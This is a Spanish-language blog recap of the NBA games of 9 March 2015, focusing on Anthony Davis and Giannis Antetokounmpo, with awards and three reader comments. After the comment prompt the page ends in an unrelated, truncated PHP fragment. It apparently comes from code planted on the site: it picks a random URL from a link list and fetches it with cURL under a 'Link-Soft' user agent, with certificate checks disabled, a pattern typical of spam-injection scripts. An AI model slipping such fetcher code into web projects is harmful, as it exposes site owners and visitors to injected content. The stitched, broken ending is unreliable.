La crónica: Una ventana al futuro

10 de March de 2015 por MagicJohnson32

Anoche, en el BMO Harris Bradley Center de Milwaukee se produjo un fenómeno extraordinario: se abrió un portal interdimensional, una ventana al futuro a través de la cual pudimos ver lo que nos deparará el baloncesto en las próximas décadas. Además, Marc se llevó el duelo entre los Gasol, y los Warriors y los Hawks alcanzaron las 50 victorias.

Os lo contamos todo a continuación.

giannisad

New Orleans Pelicans 114 – Milwaukee Bucks 103

Bienvenidos a un tiempo en el que los jugadores de baloncesto son seres genéticamente superiores, individuos que parecen salidos de un vídeojuego o de las páginas de una novela de Philip K. Dick. Bienvenidos a la Era de Anthony Davis. En el PF de los Pelicans se condensa el futuro del baloncesto y cada vez con mayor frecuencia somos testigos de lo que supone: un jugador sin límites físicos ni técnicos, capaz de anotar desde cualquier distancia, dominar el rebote, asistir como un base, intimidar, correr más rápido y saltar más alto que sus rivales. Davis desplegó todo su repertorio anoche en Milwaukee y, si lo hizo, fue en buena medida porque enfrente estuvo otro espécimen que habría que estudiar en un laboratorio: Giannis Antetokounmpo. El partido entre Pelicans y Bucks, entre Davis y Antetokounmpo, fue una plataforma para exhibir las capacidades de dos prototipos fascinantes. Los Bucks no encontraron remedio frente a Davis, porque, sencillamente, no lo hay. Los Pelicans probaron con diferentes defensores sobre Antetokounmpo después de que dejase en evidencia a Pondexter, y tampoco funcionó. El duelo se lo llevó Davis, autor de ocho puntos consecutivos en el tramo final. Un dato: entre Davis y Antetokounmpo suman 41 años, los mismos que Steve Nash. Bienvenidos al futuro.

Memphis Grizzlies 101 – Chicago Bulls 91

La expectación por ver a los hermanos Gasol frente a frente se diluyó debido a la primera comparecencia de Derrick Rose ante los medios de comunicación desde su última lesión. El base no dijo gran cosa, sólo que su plan es regresar esta misma temporada, y tal vez lo más destacado fue el escaso convencimiento que mostró. Así que devolvamos el foco al parquet del United Center, donde Grizzlies y Bulls se enfrentaban necesitados ambos de una victoria que los sacase de la línea gris que llevan últimamente. Se la llevaron los de Memphis, que aunque no se mostraron como el equipo de hace unas semanas, supieron detectar las debilidades de los Bulls y fueron superiores en la segunda mitad con Marc Gasol comandando las operaciones desde el poste medio.

Resto de la jornada

Warriors y Hawks parecen caminar de la mano esta temporada. Anoche alcanzaron ambos las 50 victorias, y ambos lo hicieron luciendo los méritos que los han alzado hasta las posiciones de privilegio que ocupan. Steph Curry protagonizó el triunfo sobre los Suns (98-80), que por algún motivo se empeñaron en pasarle los bloqueos por detrás. Mala idea. Los Hawks tiraron de colectivo para arrasar a los Kings (105-130) en un partido que estaba más que sentenciado al descanso. Tampoco hubo historia en Charlotte, donde los Wizards despertaron del letargo en el que parecían hallarse para superar con mucha claridad (95-69) a unos Hornets que anotaron 23 puntos en toda la segunda mitad. En Denver, los Knicks volvieron a quedar en evidencia (78-106) y los Nuggets volvieron a demostrar que la destitución de Brian Shaw les ha sentado bien. Uno de los resultados de mayor trascendencia fue la derrota de los Heat ante los Celtics (100-90), que devuelve a Boston de lleno a la lucha por una plaza de Playoffs. Las lesiones y una nueva expulsión de Whiteside pesaron más que la gran actuación de Wade. Y uno que viene firmando una gran actuación tras otra es DeAndre Jordan, que anoche arrasó a los Wolves (76-89) para acercar a los Clippers a la cuarta posición del Oeste.

PREMIOS

MVP: Steph Curry sería un más que digno ganador tras sus 36 puntos (14-24 TC), 6 rebotes, 5 asistencias y 4 robos. Pero, por desgracia para él, Anthony Davis no es ciencia ficción. AD anotó 43 puntos con 17 de 23 en tiros de campo, con 10 rebotes, 6 asistencias, 1 robo y 2 tapones.

Rookie: Va demostrando cositas Adreian Payne en los Wolves. Anoche fue titular, jugó más minutos que nadie en su equipo y lo aprovechó para convertirse en el primer novato que firma esta temporada más de 15 puntos y 15 rebotes en un partido. Payne logró 16-15 además de 2 asistencias, 2 robos y 1 tapón.

Sorpresa: Quién sabe, puede que papá Rivers no se equivocase al fichar a Austin. Anoche, 13 puntos, 4 rebotes, 6 asistencias y 2 robos para el jugador de los Clippers.

Decepción: Noche negra para los gemelos Morris, que sólo pudieron conectar 1 de sus 15 tiros a canasta y entre ambos se limitaron a 6 puntos en la derrota de los Suns.

Mayor esfuerzo en vano: La espectacular actuación de Giannis Antetokounmpo, sólo frustrada por Anthony Davis, se lleva nuestro reconocimiento. 29 puntos (máximo de su carrera) con 11 de 16 en tiros de campo, además de 5 rebotes, 4 asistencias, 3 robos y 3 tapones consiguió el ¿escolta? ¿alero? ¿ala-pívot? griego.

Top 10

Imágenes | AP Photos / Getty Images

Comenta

3 comentarios a esta entrada

  1. Nacho dice:
    #1

    El otro día vi a Davis (el año pasado apenas lo vi) y en la retransmisión dijeron, creo que fue Loncar, que el tiro en suspensión tras bote era nuevo de este año. Eso confirma que su techo aún no llega. Hizo de esas dos o tres seguidas. Cada día el repertorio del chaval es mayor. Parece que el título de la crónica no es descabellado. Al griego lo he visto menos, de él de momento no hablo, pero me fío de vosotros más que de los números. Y amabas cosas son buenas en él.

      Citar

  2. Nacho dice:
    #2

    Amabas x ambas, xD

      Citar

  3. MagicJohnson32 dice:
    #3

    Nacho:
    El otro día vi a Davis (el año pasado apenas lo vi) y en la retransmisión dijeron, creo que fue Loncar, que el tiro en suspensión tras bote era nuevo de este año. Eso confirma que su techo aún no llega. Hizo de esas dos o tres seguidas. Cada día el repertorio del chaval es mayor. Parece que el título de la crónica no es descabellado. Al griego lo he visto menos, de él de momento no hablo, pero me fío de vosotros más que de los números. Y amabas cosas son buenas en él.

    El griego es increíble. A veces, literalmente increíble. Hace cosas que te dejan cuestionándote la lógica de lo que acabas de ver. Tiene 20 años, ha dado un salto cualitativo brutal en su segunda temporada en la liga y no deja de crecer en todos los sentidos. Y algo especialmente positivo es que está creciendo en un equipo que quiere ser ganador.

    Lo de Anthony Davis, por supuesto, es de extraterrestre.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>